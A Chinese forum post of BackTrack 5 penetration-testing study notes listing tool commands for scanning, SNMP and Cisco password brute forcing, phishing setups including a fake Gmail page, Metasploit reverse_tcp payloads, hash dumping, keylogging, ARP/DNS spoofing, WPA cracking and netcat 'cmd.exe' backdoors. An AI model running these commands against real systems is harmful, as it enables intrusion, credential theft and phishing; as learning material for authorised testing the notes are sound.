中国网络渗透测试联盟

标题: BT5教程学习笔记 [打印本页]

作者: admin    时间: 2013-3-14 20:37
标题: BT5教程学习笔记
#################################################
#################################################
###                                           ###
###  FX-Ti出品教程                            ###
###                                           ###
###                望大家支持!               ###
###                                           ###
###                            菜鸟飞过!     ###
###                                           ###
###                             QQ:1290975089###
#################################################
#################################################



一、信息收集

I、DNS信息收集(获得内网服务器列表!)

1.Dnsenum:

cd /pentest/enumeration/dns/dnsenum

./dnsenum.pl cisco.com
先行扫描域名(解析询问)

./dnsenum.pl -f dns.txt --dnsserver (ns1.cisco.com|8.8.8.8) cisco.com -o cisco.txt
             -f dns.txt 指定字典                           cisco.com询问目标域 -o输出


II、路由信息收集

1.Tcptraceroute(TcpSYN查询):

tcptraceroute www.cisco.com


III、All-In-One智能查询

1.Maltego:Java开发的开源智能收集软件,可以用于社工,功能强大!(图形化)


----------------------------------------------------------------------------------------------------------------------------


二、扫描工具

I、主机发现

1.Arping(ARP request专ping直连):

arping -c 3 1.1.1.1
       -c 3 请求次数


2.Fping(ICMP ECHO一次请求多个主机,可实现区段扫描):

fping -s -r 1 -g 1.1.1.1 1.1.1.224
-s打印最终结果 -r 1请求次数 -g范围


3.Genlist(和上面那个原理一样,但只显示活动主机扫描结果):

genlist -s 1.1.1.\*


4.Hping3(最猛的扫描,可以自己定义请求,但是命令复杂,有时间再研究):

hping3 -c 2 1.1.1.1
-c 2简单的ECHO request请求两次,但用这个软件没有意义

{hping3
(进入hping3自己的模式)(格式可在官网查询)

hping send {ip(daddr=1.1.1.1)+icmp(type=8,code=0)}
目的地址为1.1.1.1的ICMP包,类型为8,code为0,为ECHO request

hping recv eth0
在eth0网卡上收包
}


5.Nbtscan(针对微软主机)(扫描一个范围的NetBIOS名字信息,提供关于IP、NetBIOS名、服务可用性、登录用户名、MAC地址的报告):

nbtscan 1.1.1.1-254


6.Nping(比Hping更易操作):

nping -c 1 --tcp -p 80 --flags syn 1.1.1.1
-p目的主机端口 --tcpTCPping
综述:以TCPping1.1.1.1主机80端口,第一个包为SYN


7.Onesixtyone(SNMP扫描,用于寻找SNMP Communicaty子串):

cd /pentest/enumeration/snmp/onesixtyone

./onesixtyone -c dict.txt 1.1.1.1
              -c dict.txt指定字典文件


8.Protos(用于扫描目标主机支持协议)(对路由器及其有效):

cd /pentest/enumeration/irpas

./protos -i eth0 -d 1.1.1.1 -v
         -i 接口 -d 目标IP -v 详细显示

II、操作系统指纹

1.P0f(被动的操作系统指纹监视工具,Cisco IPS就是用这个获取目标操作系统):

p0f -i eth0


2.Xprobe2(主动):

Xprobe2 1.1.1.1


III、端口扫描

1.AutoScan(图形化界面,功能简单速度慢)


2.Netifera(图形化页面,可以强大的扫描,还可以进行局域网简易抓包看密码)


3.Nmap(不解释):

nmap -v -n -sP 1.1.1.1/24  (主机发现)
-v显示结果 -n不做DNS解析 -sP SNMP的ECHO request扫描

nmap -v -n -A 1.1.1.1  (综合扫描)
           -A综合性扫描(全用上)


IV.服务探测

1.Amap(专门做端口服务探测,不够直观):

amap -bq 1.1.1.1:80


2.Httprint(用于检测HTTP服务器的软件和版本):

cd /pentest/enumeration/www/httprint/linux

./httprint -h 1.1.1.1 -s signatures.txt


V、VPN探测

1.Ike-scan(是一个IKE扫描工具,用于探测IPSec VPN服务器支持的策略):

ike-scan -M -v 1.1.1.1
主模式扫描


2.sslscan(扫算法、看证书):

sslscan 1.1.1.1


----------------------------------------------------------------------------------------------------------------------------


三、漏洞发现

I、Cisco工具

1.Cisco Auditing Tool(很小的安全审计工具,用于扫描Cisco路由器的一般性漏洞,例如默认密码,SNMP community子串和老的IOS bug):

cd /pentest/cisco/cisco-auditing-tool

./CAT -h 1.1.1.1 -w lists/community -a lists/passwords -i
      -h host    -w wordlist        -a password        -i检查老式的ISO bug


2.Cisco passwd scanner(用于批量扫描发现拥有默认telnet密码“cisco”的Cisco设备,快且有效):

cd /pentest/cisco/ciscos

./ciscos 1.1.1 3 -t 4 -C 10
               3表示3个255,等于255.255.255.0 -t超时秒数 -C最大同时连接数


II、SNMP工具

1.ADMsnmp(暴力破解SNMP community,使用预定字典):

cd /pentest/enumeration/snmp/admsnmp

./ADMsnmp 1.1.1.1 -wordf snmp.passwd


2.Snmp Enum(获取community后,获取大量关于Cisco,windows和linux的信息):

cd /pentest/enumeration/snmp/snmpenum

./snmpenum.pl 1.1.1.1 privite cisco.txt
privite--community           cisco.txt脚本还有linux和windows的在目录下


III、HTTP工具

1.Burp Suite(功能强大的web应用安全工具,扫描,分析,攻击web运用,通过手动和自动的技术,甚至一些代理攻击):

cd /pentest/web/burpsuite

java -jar burpsuite_v1.4.jar


2.Grendel Scan(web安全评估,扫描,检测,攻击普通web应用的脆弱性,生成报告):

cd /pentest/web/grendel-scan

./grendel.sh


3.Nikto2(高级web服务器安全扫描工具,扫描并检测由于服务器配置失误所造成的安全隐患):

cd /pentest/web/nikto

./nikto.pl -h 1.1.1.1 -C -p 80 -T 3478b -t 3 -D \ V -o 输出名 -F htm


4.W3AF(特性丰富的web应用攻击和审计框架,协助检测和攻击web的脆弱性):

cd /pentest/web/w3af

./w3af_console


5.WAFW00F(探测应用层防火墙):

cd /pentest/web/waffit

./wafw00f.py http://1.1.1.1


IV、SMB工具

1.Samrdump(用于访问DCE/RPC服务,需要一个系统账号,不一定是管理员,能列出所有系统服务,用户账号等等):

cd /pentest/python/impacket-examples

./samrdump.py 用户:密码@1.1.1.1 445/SMB


V、综合漏洞发现工具Nessus:

/etc/init.d/nessusd start


-------------------------------------------------------------------------------------------------------------------------------


四、社会工程学工具

I、Java Applet Attack Method

1.SET(高级的,多功能的,易于使用的计算机社会工程学工具集,功能强大!此处配置仅为示例,功能是用发一封Email然后有百度链接,伪造
签名,接着JAVA病毒运行,进而使用反连接技术获得SHELL):

cd /pentest/exploits/set

cd /config

vi set-config

修改开头中的METASPLOIT_PATH=/pentest/exploits/framework3

SELF_SIGNED_APPLET=ON

JAVA_ID_PARAM=Secure Java Applet

cd ..

./set

1

2

1

2
http://为格式
2

16

1

target's e-mail address

1

自己的账号密码

p

Email subject:主题

内容

Next line of the body:http://自己外网IP

Ctrl+C(结束)

等待


II、身份信息搜集

依然为SET,目标:制作一个类似于gmail的钓鱼网页,借此获取信息

1

2

3

2

https://gmail.com

1

target's e-mail address

1

自己的e-mail,密码

p

Email subject:主题

内容

Next line of the body:http://自己外网IP


-------------------------------------------------------------------------------------------------------------------------------


五、应用层攻击MSF

I、连环攻击

db_hosts

db_del_host 1.1.1.1

db_services

db_namp(-T Aggressive 速率:最快,-sV 服务扫描, -n不做DNS解析, -O判断操作系统, -v详细显示操作过程, 1.1.1.1————扫完存在数据库,
方便之后的自动攻击)

db_services

db_autopwn自动攻击(-p根据开放端口选择攻击模块,-t显示用过的攻击模块,-I指定主机1.1.1.1, -e开始攻击,

sessions -i 序号

meterpreter>

getuid

sysinfo

run hashdump

ps

migrate 序号

getuid

键盘记录{

keyscan_start

keyscan_dunmp

keyscan_stop}

run getgui -e(开启远程桌面)

run getgui -u username -p password(添加用户)

远程桌面{

另开终端

rdesktop 1.1.1.1:3389}


暴力破解程序

cd /pentest/password

ophcrack -g -d ~/字典文件/ -t ~/字典文件/ -f~/文件(专破微软HASH)


II、离线攻击

1.制造脚本

cd /pentest/exploits/framework

./msfpayload windows/meterpreter/reverse_tcp LHOST=自己IP LPORT=33333 X > /tmp/名字.exe
                                                                      X产生一个EXE可执行文件
2.建立接收服务器

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 自己IP

set LPORT 33333

exploit服务器启动


-------------------------------------------------------------------------------------------------------------------------------


六、局域网攻击

I、MAC泛洪攻击

1.Macof(泛洪攻击,可以多开几个):

macof


2.Dsnniff(信息嗅探,与上面一起使用):

dsniff


II、Yersinia.1.CDP

yersinia -g

也可泛洪攻击


III、Yersinia.2.DHCP


IV、Yersinia.3.DTP


V、Yersinia.4.HSRP(抢占HSRPactive):

IP倒着写


VI、Yersinia.4.STP


VII、Arpspoof

1.Wireshark

BT5路由功能打开

echo 1 > /proc/sys/net/ipv4/ip_forword

欺骗1.1.1.1,我是1.1.1.2

arpspoof -t 1.1.1.1 1.1.1.2


VIII、Ettercap之ARP欺骗

ettercap -G(功能强大)

Sniff=>Unified sniffing

Hosts=>Scan for hosts

Hosts=>Hosts list

Add to Target 1

Add to Target 2

Mitm=>Arp poisoning

Sniff remote connecting

Start=>Start sniffing

退

dsniff(这次速度慢)


IX、Ettercap之DNS欺骗

前面的步骤同上

cd /usr/share/ettercap

vi etter.dns

修改域名后IP

Plugin=>Manage the plugin

dns_spoof双击


-------------------------------------------------------------------------------------------------------------------------------


七、密码破解

I.无线密码破解

开始监控:

airmon-ng start 网卡

网络抓包:

airodump-ng -w test mon0
            -w输出

然后确认信道(CH)监控:

airodump-ng -c 信道 -w test mon0

开始deauth攻击:

aireplay-ng -0 5 -a (BSSID最后项C0) -c (SATATION,Packets多) mon0
            -0 次数 -a AP的MAC -c 客户的MAC

看到WPA handshake开始:

aircrack-ng -w /字典目录 之前的抓包(test)-*.cap

OK!

看字典质量!

Good luck!


II、Cisco密码破解

ncrack:

ncrack -U pass -v -P pass telnet://1.1.1.1
       -U 用户名(字典) -v 详细显示 -P 密码(字典)


-------------------------------------------------------------------------------------------------------------------------------


八、维持访问

I、DNS隧道技术

太麻烦,所以没看


II、Ping隧道技术

1.服务器端启用服务

cd /pentest/backdoors/ptunnel

./ptunnel


客户端启用隧道

cd /pentest/backdoors/ptunnel

./ptunnel -p 1.1.1.1(服务器端IP)-lp 2222local port) -da DNS -dp 22


连接测试

cd .ssh

ssh -p 2222 cisco@127.0.0.1(ssh 提供服务IP)


III、SSL隧道技术

服务器端:
cd /etc/stunnel

vi stunnel.conf
{
accept = 2323
connect = local IP:23
}

创建目录:var/run/stunnel

stunnel /etc/stunnel/stunnel.conf

netstat -nap|grep stunnel

客户端:

cd /etc/stunnel

vi stunnel.conf
{
accept = 2323
connect = server IP:2323

创建目录:var/run/stunnel

stunnel /etc/stunnel/stunnel.conf

telnet 127.0.0.1:2323


IV、3proxy

服务器端:
vi /pentest/backdoors/3proxy/cfg/3proxy.cfg
{
external server IP
internal server IP
tcppm 80 DNS 80
}

cd /pentest/backdoors/3proxy/

./3proxy cfg/3proxy.cfg


V、Netcat

扫描

nc -v -n -z 1.1.1.1-1.1.1.1024

ftp测试

nc 1.1.1.1 21

HTTP请求

nc 1.1.1.1 80

SMTP发邮件

nc smtp.163.com 25

SMTP收邮件

nc pop.163.com 110


后门:
1.Windows:nc.exe -d -L -p 1234 -e cmd.exe
启动一个服务器 当连接TCP的1234端口时把cmd.exe给你


2.BT:nc -l -p 1234
NC做服务器开放1234端口等待

server:nc.exe -d local IP 1234 -e cmd.exe

传文件:
Windows发送:nc -u Linux IP 53 < test.exe
                -u UDP53传文件
Linux接受:nc -l -u -p 53 > rename.txt
UDP 53接受

NC中继(抓包)

代理端Linux:ls -l telnet_relay
显示:-rwxr-xr-x

vi telnet_relay
{
#!/bin/bash
nc -o out 1.1.1.1 23
-o 抓包输出成 转到IP
}

nc -l -p 23 -e telnet_relay
当被telnet访问(访问23号端口)时,转到文件中所写地址

访问端:telnet 代理端IP




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2